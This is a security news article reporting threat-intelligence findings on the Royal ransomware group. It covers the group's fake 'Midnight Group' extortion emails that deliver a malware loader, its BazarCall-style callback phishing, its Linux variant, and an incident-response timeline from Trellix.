Fake Data Theft Proof Leads to Royal Ransomware Outbreak

Hacking is hard. Having users install their own ransomware is much easier, a Russian-speaking threat group has concluded.

See Also: OnDemand | Stop, Drop (a Table) & Roll: An SQL Highlight Discussion

The Royal ransomware group – another offshoot of the disbanded Conti group – appears to have targeted at least 50 organizations with a social engineering attack designed to trick victims into trusting the attackers, said researchers at threat intelligence firm Red Sense.

The firm last month identified a spam campaign that appears to trace to Royal and that layers on the deception, first by falsely notifying victims that they’ve been attacked by a ransomware group and then by pressuring them into opening a file that purportedly lists what was stolen but is really a malware loader.

If the victim falls for the social engineering attack, they really might fall victim to ransomware.

The scheme may have even concocted a fake ransomware group: the Midnight Group, said Yelisey Bohuslavskiy, Red Sense’s chief research officer.

Incident response firm Arete recently detailed these Midnight Group attacks, assessing that the group’s claims to have infected victims with ransomware appeared to be fake. “Victims of this fraud campaign receive emails claiming the Midnight Group was behind the original ransomware attack, and their data will be posted on the dark web if they do not pay,” Arete reported.

Red Sense says the deception goes even deeper – that Midnight is itself a fake scheme likely cooked up by Royal. This assessment is based in part on the attack telemetry and malware used by the attackers, as well as the emails received by victims.

The ploy – scaring victims into thinking their systems have been locked by ransomware and then manipulating them into installing the actual ransomware – is a variation of a gambit known as BazarCall, a “callback phishing” tactic pioneered by Conti. Attackers contact victims over the telephone and pretend to be part of the technical support team staff at a software vendor or a food-delivery company. The attackers try to trick victims into installing remote control software. When successful, attackers use their access to install malware and attempt to further penetrate the network before stealing data and crypto-locking as many files as possible.

Post-Conti Groups

Royal is an outgrowth of Conti, which splintered about a year ago after a disastrous decision to publicly back the Kremlin in its war of choice against Ukraine, a stand that dried up victims’ willingness to pay extortion.

The Royal group today counts “between 50 and 60 people” as participants, but most of them are “working in small teams” of four or five people who collaborate to find and take down new victims, Bohuslavskiy said.

When the Royal group first launched in early 2022, it used various types of ransomware, although none of its own design, researchers reported. In September 2022, the group began deploying its own ransomware, which appends .royal to the end of encrypted files. The group’s initial ransom demands often ranged from $250,000 to over $2 million, researchers said at the time.

In December 2022, U.S. officials warned that Royal appeared to be amassing healthcare targets. Last month, they said that the overall volume of the group’s attacks appeared to be picking up steam.

“They have escalated their attacks to focus on top tier-corporations for larger ransoms,” security researchers Laurie Iacono and Stephen Green at incident response firm Kroll reported in February. “Although known for using the double extortion method of both encrypting and exfiltrating data, as of this writing the group does not have a data leak site where they publish the names of their victims.”

Red Sense’s Bohuslavskiy said Royal is one of a number of groups that have opted to not run dedicated data leak sites, since they have become a focus for disruption by law enforcement agencies. Given that many ransomware-as-a-service groups use data leak sites in part to coordinate operations and shakedowns with their affiliates, disrupting such a site can lead to a massive loss in revenue for attackers, as the international takedown of Hive demonstrated (see: Ransomware Groups Seek Fresh Tactics Following Hive Takedown).

Target: Windows and Linux

Using BazarCall strategies isn’t the only trick up Royal’s sleeve. While the group’s initial ransomware targeted Windows systems, researchers last month spotted a new variant designed to infect Linux systems.

“The two executables are somewhat similar in functioning, barring some different modules, such as the existence of a network scanner in the Windows version, while the Linux version can shut ESXi virtual machines down,” security researchers Alexandre Mundo and Max Kersten at Trellix said in a research report released Tuesday.

To demonstrate some of the group’s tactics, techniques and procedures, Trellix published details of an incident response engagement it handled at the end of last year against a victim it declined to identify.

Trellix said this Royal ransomware attack began with a phishing email that instructed the recipient to download a file that eventually executed a Qbot payload, which is also used by some other post-Conti groups.

About four hours into the attack, “Cobalt Strike was installed as a service on a domain controller,” and attackers began moving laterally, escalating privileges and running some PowerShell scripts, the Trellix researchers said. Several days later, attackers exfiltrated over 25 gigabytes of data and a few days after that, they unleashed Royal ransomware, which used partial encryption to more rapidly encrypt files.

“The ransomware’s encryption scheme seems to be implemented properly,” meaning there are no obvious ways to crack flaws in its implementation to forcibly decrypt files, the researchers said. “As such, recent backups or a decryptor are the only ways to recover lost files.”